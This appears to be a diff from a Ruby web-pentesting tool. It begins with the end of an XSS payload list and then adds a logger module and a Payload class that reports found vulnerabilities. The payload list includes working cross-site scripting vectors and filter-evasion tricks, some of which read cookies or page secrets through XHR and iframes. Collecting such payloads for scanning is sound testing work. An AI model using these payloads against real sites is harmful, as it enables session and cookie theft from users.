<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
|
|
137
|
+
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
|
|
138
|
+
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
|
|
139
|
+
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
|
|
140
|
+
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
|
|
141
|
+
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
|
|
142
|
+
<svg contentScriptType=text/vbs><script>MsgBox+1
|
|
143
|
+
<svg/onload=alert(1)
|
|
144
|
+
<svg><script ?>alert(1)
|
|
145
|
+
<svg><script onlypossibleinopera:-)> alert(1)
|
|
146
|
+
<svg><script>//
confirm(1);</script </svg>
|
|
147
|
+
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
|
|
148
|
+
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
|
|
149
|
+
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
|
150
|
+
<var onmouseover="prompt(1)">On Mouse Over</var>?
|
|
151
|
+
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
|
|
152
|
+
alert
|
|
153
|
+
alert(1)
|
|
154
|
+
alert(1)
|
|
155
|
+
alert\\`1\\`
|
|
156
|
+
alert`1`
|
|
157
|
+
<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
|
|
158
|
+
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
|
159
|
+
http://www.<script>alert(1)</script .com
|
|
160
|
+
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
|
161
|
+
javascript:alert%28/xss/%29
|
|
162
|
+
javascript:alert(1)
|
|
163
|
+
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
|
164
|
+
x”</title><img src%3dx onerror%3dalert(1)>
|
|
@@ -0,0 +1,59 @@
|
|
|
1
|
+
require 'date'
|
|
2
|
+
require 'term/ansicolor'
|
|
3
|
+
|
|
4
|
+
module Pentest
|
|
5
|
+
module Logger
|
|
6
|
+
PADDING = ' ' * 10
|
|
7
|
+
MAX_WIDTH = 60
|
|
8
|
+
|
|
9
|
+
@@progress_counter = 0
|
|
10
|
+
|
|
11
|
+
class << self
|
|
12
|
+
def debug(text, timestamp: true)
|
|
13
|
+
puts "#{time(timestamp)} #{Term::ANSIColor.blue(text)}"
|
|
14
|
+
end
|
|
15
|
+
|
|
16
|
+
def info(text, timestamp: true)
|
|
17
|
+
puts "#{time(timestamp)} #{Term::ANSIColor.green(text)}"
|
|
18
|
+
end
|
|
19
|
+
|
|
20
|
+
def warn(text, timestamp: true)
|
|
21
|
+
puts "#{time(timestamp)} #{Term::ANSIColor.yellow(text)}"
|
|
22
|
+
end
|
|
23
|
+
|
|
24
|
+
def error(text, timestamp: true)
|
|
25
|
+
puts "#{time(timestamp)} #{Term::ANSIColor.red(text)}"
|
|
26
|
+
end
|
|
27
|
+
|
|
28
|
+
def time(enabled = true)
|
|
29
|
+
return PADDING unless enabled
|
|
30
|
+
now = Time.now
|
|
31
|
+
"[#{now.strftime("%H:%M:%S")}]"
|
|
32
|
+
end
|
|
33
|
+
|
|
34
|
+
def start_progress
|
|
35
|
+
print PADDING + ' '
|
|
36
|
+
@@progress_counter = 0
|
|
37
|
+
end
|
|
38
|
+
|
|
39
|
+
def put_progress(char)
|
|
40
|
+
if @@progress_counter + char.size > MAX_WIDTH
|
|
41
|
+
print "\n"
|
|
42
|
+
print PADDING + ' '
|
|
43
|
+
@@progress_counter = 0
|
|
44
|
+
end
|
|
45
|
+
|
|
46
|
+
print char
|
|
47
|
+
@@progress_counter += char.size
|
|
48
|
+
end
|
|
49
|
+
|
|
50
|
+
def end_progress
|
|
51
|
+
print "\n"
|
|
52
|
+
end
|
|
53
|
+
|
|
54
|
+
def print_seperator
|
|
55
|
+
print "\n"
|
|
56
|
+
end
|
|
57
|
+
end
|
|
58
|
+
end
|
|
59
|
+
end
|
|
@@ -0,0 +1,76 @@
|
|
|
1
|
+
require 'term/ansicolor'
|
|
2
|
+
|
|
3
|
+
module Pentest
|
|
4
|
+
class Payload
|
|
5
|
+
attr_accessor :params, :values, :penetration_confidence, :injection, :penetration_message, :penetration_type
|
|
6
|
+
|
|
7
|
+
def initialize(data = {})
|
|
8
|
+
@route = data.fetch(:route)
|
|
9
|
+
@params = data.fetch(:params, [])
|
|
10
|
+
@values = data.fetch(:values, [])
|
|
11
|
+
@injection = data.fetch(:injection, '')
|
|
12
|
+
@injection_point = data.fetch(:injection_point, nil)
|
|
13
|
+
|
|
14
|
+
@penetration_confidence = nil
|
|
15
|
+
@penetration_message = nil
|
|
16
|
+
@penetration_type = nil
|
|
17
|
+
end
|
|
18
|
+
|
|
19
|
+
def params_hash
|
|
20
|
+
@params.zip(@values).to_h
|
|
21
|
+
end
|
|
22
|
+
|
|
23
|
+
def to_s(index)
|
|
24
|
+
path_parameters = {}
|
|
25
|
+
query_parameters = []
|
|
26
|
+
|
|
27
|
+
vulnerability_name = @penetration_type.upcase
|
|
28
|
+
if @penetration_confidence == :preattack
|
|
29
|
+
vulnerability_name = "POSSIBLE #{vulnerability_name}"
|
|
30
|
+
end
|
|
31
|
+
|
|
32
|
+
lines = []
|
|
33
|
+
|
|
34
|
+
lines << Term::ANSIColor.red("#{index + 1}. #{vulnerability_name} FOUND")
|
|
35
|
+
|
|
36
|
+
lines << ''
|
|
37
|
+
|
|
38
|
+
lines << '=== Payload ==='
|
|
39
|
+
|
|
40
|
+
params_hash.each_with_index do |(param, value), index|
|
|
41
|
+
if @route.required_parts.include? param[0]
|
|
42
|
+
path_parameters[param[0]] = value
|
|
43
|
+
else
|
|
44
|
+
if @injection_point == index
|
|
45
|
+
if @penetration_confidence == :attack
|
|
46
|
+
query_parameters << [param, Term::ANSIColor.red(URI.encode(@injection))]
|
|
47
|
+
else
|
|
48
|
+
query_parameters << [param, Term::ANSIColor.red('[malicious payload]')]
|
|
49
|
+
end
|
|
50
|
+
else
|
|
51
|
+
query_parameters << [param, URI.encode(value)]
|
|
52
|
+
end
|
|
53
|
+
end
|
|
54
|
+
end
|
|
55
|
+
|
|
56
|
+
lines << "#{@route.verb} #{@route.format(path_parameters)}"
|
|
57
|
+
|
|
58
|
+
query_parameters.each_with_index do |(param, value), index|
|
|
59
|
+
key = if param.size == 1
|
|
60
|
+
param[0]
|
|
61
|
+
else
|
|
62
|
+
"#{param[0]}[#{param[1]}]"
|
|
63
|
+
end
|
|
64
|
+
|
|
65
|
+
lines << "#{' ' * @route.verb.size} #{index == 0 ? '?' : '&'}#{key}=#{value}"
|
|
66
|
+
end
|
|
67
|
+
|
|
68
|
+
lines << ''
|
|
69
|
+
|
|
70
|
+
lines << '=== Proof of Penetration ==='
|
|
71
|
+
lines << @penetration_message
|
|
72
|
+
|
|
73
|
+
lines.join("\n")
|
|
74
|
+
end
|
|
75
|
+
end
|
|
76
|
+
end
|